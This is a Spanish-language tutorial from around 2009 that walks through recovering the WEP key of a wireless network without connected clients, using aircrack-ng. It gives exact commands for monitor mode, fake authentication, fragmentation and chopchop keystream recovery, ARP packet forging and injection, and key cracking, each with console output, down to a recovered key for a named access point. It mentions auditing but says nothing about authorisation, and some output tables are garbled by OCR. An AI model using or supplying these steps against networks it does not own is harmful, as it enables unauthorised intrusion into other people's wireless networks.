# Obtener la clave WEP de una red inalámbrica sin clientes

# Introducción

Existe mucha teoría y mucha información acerca de cómo extraer la clave WEP de una red inalámbrica en Internet. Más concretamente podría decirse que cada texto y cada guía que se puede encontrar viene a ser un resumen o adaptación de la documentación que puede encontrarse en el sitio oficial de aircrack<sup>1</sup>.

La intención de esta guía será mostrar los pasos concretos para obtener la clave WEP de una red en la que no existen clientes inyectando para ello el tráfico necesario. La guía se puede seguir al pie de la letra para una tarjeta PCMCIA con chip *Atheros Super-G*. usando el driver *ath5k* con kernel 2.6.27 o superior. Otros drivers no serán contemplados en esta guía aunque podrá servir con pequeñas adaptaciones.

No es la intención de esta guía explicar los parámetros de los programas usados ni el por qué de los mismos. Todo eso y más se puede encontrar en la documentación de aircrack.

# Procedimiento

# Deshabilitar NetworkManager

En las últimas distribuciones de GNU/Linux se encuentra activo el proceso Network Manager que interfiere en el proceso de auditoría. Lo primero que se hará es desactivarlo:

sudo /etc/init.d/NetworkManager stop

## Poner la tarjeta en modo monitor

Con la siguiente orden se pondrá la tarjeta en modo monitor:

```
sudo airmon-ng start wlan2
```

El sistema responderá algo similar a:

| Interface     | Chipset      | Driver |                                |
|---------------|--------------|--------|--------------------------------|
| eth1<br>wlan2 | Intel Athero | 2200BG | ipw2200<br>atb5k - [pby0]      |
| in call2      | A cherro     | 5      | (monitor mode enabled on mon0) |

Esto indica que la tarjeta Atheros en la interfaz wlan2 se ha puesto en modo monitor en una nueva interfaz mon0.

## Examinar las redes presentes y empezar a capturar

Se examinarán las redes presentes mediante:

sudo airodump-ng mon0

Obteniendo algo similar a:

```
CH 5 ][ Elapsed: 24 s ][ 2009-05-09 19:44
```

```
1 http://www.aircrack-ng.org/
```

| BSSID             | PWR Beacons #     | #Data, #/s CH | MB ENC  | CIPHER AUTH ESSID |
|-------------------|-------------------|---------------|---------|-------------------|
| 00:12:17:DD:4C:07 | -60 67            | 6 0 6         | 54 WEP  | WEP ratonera      |
| BSSID             | STATION           | PWR Rate      | Lost Pa | ackets Probes     |
| (not associated)  | 00:0E:35:A2:24:3D | D -62 0 - 1   | L 131   | 210               |

De aquí se anotarán los siguientes datos:

| AP MAC ADDRESS: | 00:12:17:DD:4C:07 |
|-----------------|-------------------|
| ESSID:          | ratonera          |
| CHANNEL:        | 6                 |

Y se empezará a capturar aplicando esta configuración para filtrar la red que nos interesa:

sudo airodump-ng -c 6 --bssid 00:12:17:DD:4C:07 -w out mon0

#### Falsear autenticación con el punto de acceso

En un nuevo terminal se escribirá:

sudo aireplay-ng -1 60 -e ratonera -a 00:12:17:DD:4C:07 -h 00:18:e7:35:3e:ec mon0

Siendo 00:18:e7:35:3e:ec la MAC de la tarjeta de red usada. La consola responderá:

```
20:03:25 Waiting for beacon frame (BSSID: 00:12:17:DD:4C:07) on channel 6
20:03:25 Sending Authentication Request (Open System)
20:03:25 Authentication successful
20:03:25 Sending Association Request
20:03:25 Association successful :-) (AID: 1)
20:03:40 Sending keep-alive packet
```

Y se quedará ahí manteniendo la autenticación durante todo el proceso. Se continuará en un nuevo terminal.

Si hay algún problema con la autenticación se probará con:

```
sudo aireplay-ng -1 6000 -o 1 -q 10 -e ratonera -a 00:12:17:DD:4C:07 -h
00:18:e7:35:3e:ec mon0
```

#### Obtención del algoritmo de generación PRGA

Para probar el método de fragmentación, en un nuevo terminal se escribirá:

sudo aireplay-ng -5 -b 00:12:17:DD:4C:07 -h 00:18:e7:35:3e:ec mon0

El sistema responderá:

```
20:08:31 Waiting for beacon frame (BSSID: 00:12:17:DD:4C:07) on channel 6
20:08:31 Waiting for a data packet...
Size: 78, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:12:17:DD:4C:07
Dest. MAC = 01:80:C2:00:00:00
Source MAC = 00:12:17:DD:4C:07
0x0000: 0842 0000 0180 c200 0000 0012 17dd 4c07 .B.....L.
0x0010: 0012 17dd 4c07 505e 721a 0100 e4c1 b6e2 ...L.P^r.....
0x0020: c7bf 46fa ee94 ec34 1b66 6248 47e0 a995 ..F...4.fbHG...
0x0030: a9ac 95af 263e dd20 5e57 c4cb 2d18 a971 ....&>. ^W..-..q
0x0040: 2855 8350 9b93 876b a632 68a0 7327 (U.P...k.2h.s'
Use this packet ? y
```

```
Saving chosen packet in replay_src-0509-200831.cap

20:08:33 Data packet found!

20:08:33 Sending fragmented packet

20:08:33 Got RELAYED packet!!

20:08:33 Got RELAYED packet!!

20:08:33 Got RELAYED packet!!

20:08:33 Trying to get 1500 bytes of a keystream

20:08:33 Got RELAYED packet!!

Saving keystream in fragment-0509-200833.xor

Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
```

Si el ataque por fragmentación no tiene éxito se probará la técnica chopchop:

```
sudo aireplay-ng -4 -b 00:12:17:DD:4C:07 -h 00:18:e7:35:3e:ec mon0
```

### Crear un paquete arp

Con ayuda de packetforge-ng se creará un paquete arp usando el fichero generado en el paso anterior:

```
packetforge-ng -0 -a 00:12:17:DD:4C:07 -h 00:18:e7:35:3e:ec -k 255.255.255.255 -l 255.255.255 -y fragment-0509-200833.xor -w arp-request
```

El sistema responderá:

Wrote packet to: arp-request

## Inyectar el paquete arp

Finalmente se inyectará el paquete arp mediante:

sudo aireplay-ng -2 -r arp-request mon0

```
El sistema responderá:
```

En este momento los paquetes de datos capturados deberán de crecer a razón de unos 500 paquetes por segundo, como se indique entre paréntesis, y el número de paquetes de datos capturados deberá de coincidir aproximadamente con los paquetes enviados. De ser así, al llegar a 20.000 paquetes se podrá pasar al siguiente punto.

# **Obtener la clave WEP**

En una consola nueva, sin detener los procesos anteriores se escribirá:

```
aircrack-ng -b 00:12:17:DD:4C:07 -n 128 out-01.cap
```

Si no aparece la clave en menos de 10 segundos se detendrá con Ctrl+C y se probará cuando haya al menos 40.000 paquetes de datos. En la pantalla aparecerá la siguiente información:

```
Aircrack-ng 1.0 rc3
                   [00:00:00] Tested 724 keys (got 57260 IVs)
KB
     depth
              bvte(vote)
              A7(76032) 30(68096) 08(66816) 84(66560) 13(66048) 70(65024)
0
     0/ 13
     0/ 1
6/ 2
1
              34(80640) A2(68608) F6(66816) E1(66560) FF(65792) 92(65280)
              E1(64768) 02(64000) 31(64000) 25(63744) 98(63744) BF(63744)
2
3
              63(89856) C8(69376) 1B(66816) 5E(65792) 28(65280) B6(65024)
     0/ 1
              D6(61440) 1A(60928) 57(60928) D8(60928) DE(60928) 82(60672)
4
    45/
        4
          KEY FOUND! [ 1A:57:97:7C:98:C9:64:C4:87:42:29:69:4C ]
   Decrypted correctly: 100%
```

# Licencia

Este documento se distribuye bajo la licencia creative commons **"Reconocimiento-No comercial-Sin obras derivadas 3.0 España"**<sup>2</sup> la cual especifica que:

## Usted es libre de:

• Copiar, distribuir y comunicar públicamente la obra

## Bajo las condiciones siguientes:

- Reconocimiento. Debe reconocer los créditos de la obra de la manera especificada por el autor o el licenciador (pero no de una manera que sugiera que tiene su apoyo o apoyan el uso que hace de su obra).
- No comercial. No puede utilizar esta obra para fines comerciales.
- Sin obras derivadas. No se puede alterar, transformar o generar una obra derivada a partir de esta obra.

Se ha elegido esta licencia más restrictiva que otras debido a que el autor desea que si se escribe una nueva guía se haga a partir de la documentación original que siempre será más completa y estará más actualizada que el presente documento.

<sup>2</sup> http://creativecommons.org/licenses/by-nc-nd/3.0/es/